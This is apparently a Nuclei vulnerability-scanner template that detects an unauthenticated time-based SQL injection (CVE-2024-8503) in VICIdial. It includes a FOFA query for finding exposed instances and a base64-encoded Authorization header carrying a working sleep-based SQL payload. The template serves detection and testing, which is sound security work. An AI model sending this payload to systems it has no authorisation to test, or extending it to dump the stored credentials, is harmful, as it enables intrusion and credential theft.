59 lines
1.7 KiB
YAML
59 lines
1.7 KiB
YAML
id: CVE-2024-8503
|
|
|
|
info:
|
|
name: VICIdial - SQL Injection
|
|
author: s4e-io
|
|
severity: critical
|
|
description: |
|
|
An unauthenticated attacker can leverage a time-based SQL injection vulnerability in VICIdial to enumerate database records. By default, VICIdial stores plaintext credentials within the database.
|
|
reference:
|
|
- https://en.0day.today/exploit/39746
|
|
- https://github.com/Chocapikk/CVE-2024-8504
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2024-8503
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2024-8503
|
|
cwe-id: CWE-89
|
|
epss-score: 0.00043
|
|
epss-percentile: 0.09586
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: vicidial
|
|
product: vicidial
|
|
fofa-query: icon_hash="1375401192"
|
|
tags: cve,cve2024,vicidial,sqli
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /vicidial/welcome.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains_all(body,"Agent Login","Timeclock","Administration")'
|
|
- 'contains(content_type,"text/html")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
@timeout 20s
|
|
GET /VERM/VERM_AJAX_functions.php?function=log_custom_report HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Authorization: Basic JywnJyxzbGVlcCg2KSk7IzpiYXI=
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration>=6'
|
|
- 'contains(content_type,"text/html")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
# digest: 4b0a004830460221009619fe649b2a4eee2f96ef713d8e2c975bdc40ef1a978fe2c619837159faaac80221008669354af888773a90db34e9fd20701314575ad6065575debdc4dd1aed3a0bb7:922c64590222798bb761d5b6d8e72950 |